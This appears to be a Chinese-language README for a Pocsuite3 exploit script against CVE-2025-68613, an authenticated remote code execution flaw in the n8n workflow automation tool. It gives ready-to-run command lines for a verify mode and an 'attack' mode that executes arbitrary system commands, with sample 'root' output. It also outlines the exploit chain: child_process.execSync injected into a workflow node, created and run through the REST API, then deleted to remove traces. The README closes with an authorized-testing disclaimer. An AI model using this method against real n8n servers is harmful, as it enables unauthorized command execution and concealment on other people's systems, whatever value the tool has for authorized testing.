
基于Pocsuite3 框架编写的漏洞验证与利用脚本,用于检测 n8n工作流自动化工具中的认证后远程代码执行漏洞(RCE)
CVE ID: CVE-2025-68613
Type: Authenticated Remote Code Execution
Framework: Pocsuite3
这是一个基于 Pocsuite3 框架编写的漏洞验证与利用脚本,用于检测 n8n 工作流自动化工具中的认证后远程代码执行漏洞(RCE)。该脚本支持无害化验证(Verify)和命令执行(Attack)两种模式,并具备自动清理测试痕迹的功能。
本脚本在 Pocsuite3 的基础参数上扩展了以下自定义参数,运行时需通过 --options 传递:
| 参数名 | 必填 | 默认值 | 描述 |
|---|---|---|---|
api_key | ✅ | - | 目标的 X-N8N-API-KEY (鉴权必须) |
cmd | ❌ | id | Attack 模式下要执行的系统命令 |
确保已安装 pocsuite3 (pip install pocsuite3),并将脚本保存为 n8n_auth_rce.py。
验证模式下,脚本会向目标发送一个包含安全数学计算(11111 + 22222)的工作流。如果返回结果为 33333,则证明 JS 引擎可被恶意调用。
此模式无害,不会执行系统命令。
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --verify --options '{"api_key": "YOUR_API_KEY_HERE"}'
预期输出:
[+] Vulnerable! JS Expression executed. Result: 33333
攻击模式允许你执行任意系统命令。默认执行 id 命令,你也可以通过 cmd 参数自定义命令。
执行默认命令 (id):
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE"}'
执行自定义命令 (如 whoami):
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE", "cmd": "whoami"}'
预期输出:
[+] Command 'whoami' executed:
root
本 PoC 的执行流程设计为闭环操作,确保最小化对目标系统的残留影响:
api_key 构造一个包含 n8n-nodes-base.set 节点的恶意 Workflow JSON。require('child_process').execSync(...)) 注入到节点的 value 字段中。POST 请求至 /rest/workflows 创建临时工作流,获取 workflow_id。POST 请求至 /rest/workflows/{id}/run 触发工作流执行,并解析返回的 JSON 获取命令执行结果。DELETE 请求至 /rest/workflows/{id} 删除该临时工作流,保持环境清洁。请在使用前仔细阅读
- 授权原则: 本工具仅供网络安全从业人员在获得明确授权的情况下,对目标系统进行安全性测试或漏洞验证。
- 非法行为: 严禁将本工具用于任何未授权的渗透测试、攻击行为或非法用途。
- 责任承担: 使用本工具所产生的任何后果(包括但不限于系统损坏、数据丢失、法律纠纷)均由使用者自行承担,开发者及贡献者不承担任何法律责任。
- 合规性: 使用者应遵守当地法律法规(如《中华人民共和国网络安全法》等)。